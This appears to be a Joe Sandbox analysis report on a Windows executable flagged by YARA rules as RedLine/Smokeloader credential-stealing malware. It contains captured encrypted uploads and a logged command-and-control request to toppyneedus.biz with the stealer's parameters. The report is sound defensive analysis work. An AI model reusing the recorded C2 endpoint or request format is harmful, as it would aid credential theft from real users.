                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: aa 60 98 ca cb 6e 07 38 ea 87 a8 0e 53 c4 72 ad 27 fc 49 a9 5f 1f 6d 66 ec 76 c2 e7 c7 e7 3f f8 aa c8 37 7f 63 ee 53 43 bf 98 d0 4f a5 e8 20 86 11 3b b6 07 37 eb 47 78 38 9f f0 c0 b8 da d8 03 dd d1 95 97 32 e7 a2 10 36 b9 71 f6 63 5a b5 a1 9e 5c 42 93 e1 a5 e9 aa 27 f4 64 b4 b9 7a f6 c3 fe ee 05 16 98 f0 fc 55 a2 a6 44 a4 13 57 79 79 26 d6 0a be 12 83 6f 9d 7b 1a e1 a1 df f5 ee 25 a2 dd a8 b6 bf 71 1b fe 8c 71 e7 5b 5d 3b 99 5f 67 1b e2 17 9a 3e 7b bd 4d ed c5 4d 43 3b 11 e2 ab 86 f8 a6 63 c9 68 cf 42 8a fa c8 c1 08 f5 ac f8 b8 cf 92 a3 d0 b2 c8 ea a1 d9 06 57 f5 6b 9c eb 87 f0 2f 28 09 2e 6e 46 f3 5a 91 76 70 9b c2 9a 2f aa dd 78 13 41 29 8a 60 fa cf d8 98 ae b8 b5 62 1c 57 cf 40 71 2a fb 6c c8 ca fb d8 9e df 35 87 30 3e 16 d5 bf 86 55 71 fb 92 e9 ba 7a
                                                                                                  Data Ascii: `n8Sr'I_mfv?7cSCO ;7Gx826qcZ\B'dzUDWyy&o{%qq[];_g>{MMC;chBWk/(.nFZvp/xA)`bW@q*l50>Uqz
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: 37 68 e6 11 3c 5f 21 d9 0d 13 b0 1f 62 7c 98 eb 5a fa 31 77 55 62 e3 da 4c 50 de 9d 6e 97 f3 c3 9f f2 84 b0 60 7f fb d4 ae c3 c9 f7 50 27 fe 32 d7 02 09 df d1 db de bd c3 25 7a c3 39 ee 46 8c 45 11 79 56 08 ec af 9f 1a 4d 39 bc bd 12 89 8f 7d c3 31 b0 f6 9b 29 62 a3 5a 5c e1 f7 54 04 85 8c f8 84 bc 1c 66 38 b5 b9 6c d3 e7 33 5e d4 4f 77 4a 4d 9c d7 8f 3c a6 11 ff d1 08 31 ee db 05 b3 2d 28 be e8 1d 1d 72 61 c1 9a 1c 39 54 e4 4d 1e aa c0 bc 4a d7 d9 bd e6 f3 59 2c 49 54 f5 ae 7a df 12 8e 0a 88 60 62 7c 82 5e e3 41 60 de 3c 62 65 9b 86 68 b4 f6 9f f3 3e 18 da 5e 8a 5a 89 45 51 36 dd ed c3 8b 31 11 a0 a5 09 08 fc 40 61 f0 39 34 9f 4c bd ba 45 e1 23 5c e3 80 54 85 1a 83 42 28 1e 9f 7e 36 3b ea 68 d9 16 58 64 ae 0d 2b e6 2a ed cd 26 25 58 90 35 05 96 ec 8d bf
                                                                                                  Data Ascii: 7h<_!b|Z1wUbLPn`P'2%z9FEyVM9}1)bZ\Tf8l3^OwJM<1-(ra9TMJY,ITz`b|^A`<beh>^ZEQ61@a94LE#\TB(~6;hXd+*&%X5
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: 29 bd 7a 29 ac 5b 3c 9b 9c d0 4a c3 01 81 72 84 f6 cd 97 bc c9 30 11 26 00 d3 b9 59 c3 49 ec 56 c8 f3 6d 4b 9a db 10 3c c3 77 8e 84 b5 99 72 5b fe 2f 97 50 57 63 30 e9 2d d8 78 a7 7b 24 5a 1b e7 14 79 49 02 71 63 24 5a 17 11 d4 4b fd 37 94 48 46 b5 b2 fb ae ef 6b 65 17 be c1 ab 55 20 c4 65 94 0d 07 f5 bd 52 91 b7 81 5f 19 a2 1d c2 9a 47 fa f7 7d f7 80 84 5a b0 af 6d 0b d2 5a d9 11 40 66 b9 f0 66 f2 03 8c 54 4c 9f b7 c0 80 cc a1 ab 39 af fe 92 a0 69 88 f7 50 df 3e d8 6c 95 c0 67 d3 1e 09 11 67 b7 3a 03 8a 77 37 e8 21 b3 84 cc 83 9e 5d 53 d1 f9 f7 c2 6b c6 99 2b d5 7c 9c 22 91 e4 8d 0b 70 38 1c ec 27 8b d8 82 78 ea 9c ac b8 0a 94 a9 06 8a 8e 2b 1a 5b 82 6c 2f 9a cc 8e 97 01 da 81 cc cd c6 62 ab 51 27 ac a6 50 7e 8f cc c2 28 28 3f 3e d0 dd e1 66 f6 aa 75 8b
                                                                                                  Data Ascii: )z)[<Jr0&YIVmK<wr[/PWc0-x{$ZyIqc$ZK7HFkeU eR_G}ZmZ@ffTL9iP>lgg:w7!]Sk+|"p8'x+[l/bQ'P~((?>fu
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: 6b e1 68 eb ab 33 65 f3 8b 8d 9c 93 cb 6d 04 4d b6 c2 52 e1 70 fa e6 b6 45 84 26 9f 59 3b 5b f6 45 c8 a2 46 a8 c6 40 b8 30 f3 fa 19 31 d1 b1 f6 69 7a 82 fb 35 a1 0f 0d ce b7 1c 7a 85 76 ee 9c 05 7d cc f5 95 ff 2d 79 90 97 0f 3d d7 f6 91 ee 2d 44 f4 df 3e 3f bf cf 46 f5 d2 f9 23 fc 59 01 76 b3 6b 9b b9 27 71 be 48 a5 56 81 f1 41 5a 07 16 75 b2 50 e0 e8 2b ab 83 bb 78 57 90 7a 82 42 50 e5 31 8a 3a 2a 25 1f 68 05 f1 68 d0 6e 99 fc 38 73 94 5b c6 03 14 c3 f6 6b ef 0d cd 5e ac b1 0a 8e 8c 01 70 ea 43 ae fc a1 39 1f d1 02 ac d5 aa 3d 40 ff 5e 1d b2 93 07 64 65 e8 62 f5 8f 2e d3 51 c0 c4 b8 59 07 39 80 2d 48 85 be 1a c0 7c 40 1d 75 ae 94 5b 83 e3 d2 a6 97 0a 85 88 b9 ae f9 7c ac 33 fa 99 1a b5 ba f2 41 41 b2 e0 d4 42 cd 15 ef ef 4d 77 af 69 90 ce af 26 a1 f1 7c
                                                                                                  Data Ascii: kh3emMRpE&Y;[EF@01iz5zv}-y=-D>?F#Yvk'qHVAZuP+xWzBP1:*%hhn8s[k^pC9=@^deb.QY9-H|@u[|3AABMwi&|
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: 93 f4 45 2d a8 ad 46 42 40 e6 c9 59 3b ce f4 f8 d5 11 e8 6f ee 11 39 f7 02 f0 2f 48 2f a9 c0 b8 85 41 31 ad ea af 9f db d1 0f 86 af 80 1f 97 7e af 3e 33 bb ec 08 8c 8e c1 92 21 f1 f4 de 9d 43 06 48 0e 3a b2 72 6a f5 d4 cf 06 24 a3 4c 1c cb a1 05 74 5e 4d 59 ec 21 29 2b 02 fb da 5c 86 fd 6c f5 1b db bb 21 ad 37 9e a8 74 1c a5 67 e0 9a f3 8b 07 3b 7f 15 29 9c 80 aa d7 3e 78 dd 6c f5 33 c8 d4 91 9d b6 91 de 74 a1 82 e2 17 8d 09 d3 2e 11 8a cf 0f de d6 20 ae ba 42 48 b4 f6 37 fe 1c bb 1e 4e d9 b0 e1 a9 98 62 e9 f0 25 49 5e da f5 a2 96 dd 7b 2d 46 26 b3 88 6e ae f4 91 74 8b 8f 39 e9 83 d5 bd 6f 9e b9 2e ba 38 94 49 d1 2d af af 3d c8 0b ee 92 c9 0b be 1c 75 23 cb fc 31 70 6f a1 cb 90 f0 7d 9c c7 bf 5f a3 a0 67 59 96 4f 5b 85 c0 83 d3 73 35 65 c9 69 5e 58 70 8b
                                                                                                  Data Ascii: E-FB@Y;o9/H/A1~>3!CH:rj$Lt^MY!)+\l!7tg;)>xl3t. BH7Nb%I^{-F&nt9o.8I-=u#1po}_gYO[s5ei^Xp
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: a7 37 22 4e c8 05 7b 51 93 11 c7 da 39 98 73 cd 5d 74 8d 62 df 74 54 19 da dc e0 d9 9a f4 05 ef ec d9 d3 9e 37 3f cd 90 20 a5 ac ff 6c bf e7 3f eb 97 7f 63 f6 25 7f b8 c7 89 3f d7 18 56 6b c3 68 e1 a5 fa d9 89 62 c7 ab 66 68 cc 7e 1e 86 ba de 9f e2 b2 9e 35 fb d2 ef 8e 12 4c 0d 18 7c e0 3b f2 6c ce 8f b8 4a a4 ce e9 ba b2 61 4e 67 0d a6 b7 a9 92 f2 c5 a0 8d ba 70 cb ac 67 c4 96 5f 19 c2 cd c2 98 05 ba a4 88 06 d9 a6 88 27 c3 4c 77 f4 8a bb 60 c3 cc 8e ae f4 0f da f3 ff 48 af fc 1b 36 47 99 ba 6a 76 59 10 74 f9 35 9a 6c 41 82 12 25 76 fb 33 4e 13 82 b1 dd e7 66 b5 4f e7 42 44 48 df d4 17 05 f7 eb 59 7a 67 76 7a cf d2 5d c5 4a 2f 87 55 bf 71 0f a0 52 6a dc ed 73 2c d9 eb f9 87 ef 1e 6b b6 6e 58 95 f8 3b 67 ab 71 d7 df 13 ff 6a 82 c4 ff 82 22 a2 d1 10 74 e8
                                                                                                  Data Ascii: 7"N{Q9s]tbtT7? l?c%?Vkhbfh~5L|;lJaNgpg_'Lw`H6GjvYt5lA%v3NfOBDHYzgvz]J/UqRjs,knX;gqj"t
                                                                                                  2025-01-26 14:48:11 UTC1137INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:11 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=2mti2v8sh61fqsc57loo8b9jv2; expires=Thu, 22 May 2025 08:34:49 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F0riiMEr56Z6%2FgkFUsuSmrJgAQUgCnaXzHJonHUVgaimyKJDO5oLcLynw%2BYa22k0YUxoXvmOQVZGnfIxkziDAdu%2F2MMxGviR9TWwR1zP3M%2FTnZObiDR1hb%2FzHHSYEP5TrC8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d5e884a0cc2-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1635&min_rtt=1628&rtt_var=624&sent=196&recv=577&lost=0&retrans=0&sent_bytes=2838&recv_bytes=559742&delivery_rate=1733966&cwnd=177&unsent_bytes=0&cid=c79dc0aa5095e199&ts=2611&x=0"


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.749746172.67.149.664437120C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-26 14:48:11 UTC263OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 77
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:11 UTC77OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 26 68 77 69 64 3d 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45
                                                                                                  Data Ascii: act=get_message&ver=4.0&lid=4h5VfH--&j=&hwid=F219C69B1FC0C6F14654FD9A0884370E
                                                                                                  2025-01-26 14:48:12 UTC1125INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:12 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=b6facoub3d94ht8475c6qu2pt1; expires=Thu, 22 May 2025 08:34:51 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uesTc%2Bk52eb5QqsVGovvKwxTz847RbkU95C5E7m%2FXJ8ajs2%2F0mDf6V8rq5oDIX0Oex5yb54N%2FiXgrWgKJwVDyIyev2rQQuHcIaQp1pL7f77L7qjPQhYaxnYhrLTOo6yKqWs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d72df348c0f-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1857&min_rtt=1853&rtt_var=703&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=976&delivery_rate=1548250&cwnd=229&unsent_bytes=0&cid=5f68dbdbe1b1ed36&ts=496&x=0"
                                                                                                  2025-01-26 14:48:12 UTC54INData Raw: 33 30 0d 0a 4a 62 4c 49 4a 78 56 78 46 75 57 45 59 6b 54 2b 61 68 71 55 7a 72 75 73 6d 4f 6a 34 64 6e 59 44 38 46 48 4d 72 33 67 70 59 4f 70 2b 37 77 3d 3d 0d 0a
                                                                                                  Data Ascii: 30JbLIJxVxFuWEYkT+ahqUzrusmOj4dnYD8FHMr3gpYOp+7w==
                                                                                                  2025-01-26 14:48:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  050100s020406080100

                                                                                                  Click to jump to process

                                                                                                  050100s0.0051015MB

                                                                                                  Click to jump to process

                                                                                                  • File
                                                                                                  • Registry

                                                                                                  Click to dive into process behavior distribution

                                                                                                  Click to jump to process

                                                                                                  Target ID:4
                                                                                                  Start time:09:47:57
                                                                                                  Start date:26/01/2025
                                                                                                  Path:C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\4JPKDcwtDo.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:400'384 bytes
                                                                                                  MD5 hash:5530E06DB7D6818359BEF99C53EBEF57
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1352139150.000000000074C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.1650950894.0000000000678000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.1651366354.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000003.1352545477.0000000000750000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  Reputation:low
                                                                                                  Has exited:true
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                  Target ID:11
                                                                                                  Start time:09:48:11
                                                                                                  Start date:26/01/2025
                                                                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7120 -s 616
                                                                                                  Imagebase:0x690000
                                                                                                  File size:483'680 bytes
                                                                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                                                  There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                                                  Non-executed Functions

                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000003.1352162990.0000000000708000.00000004.00000020.00020000.00000000.sdmp, Offset: 00708000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_3_708000_4JPKDcwtDo.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BRZ$BTZ$BVZ
                                                                                                  • API String ID: 0-3476765399
                                                                                                  • Opcode ID: 9caa18a8b207bfbcc21e96793ea13f94d76620dfd4578c794d28754007e76399
                                                                                                  • Instruction ID: 242d5b0d75e64b768459a7f2801baf96459743f409a02db5984b9a72d34e6025
                                                                                                  • Opcode Fuzzy Hash: 9caa18a8b207bfbcc21e96793ea13f94d76620dfd4578c794d28754007e76399
                                                                                                  • Instruction Fuzzy Hash: E5A21E5144E3C18FD7278B704939691BFB0AE23214B1E8ADFC4C58F8E3E25D984AD362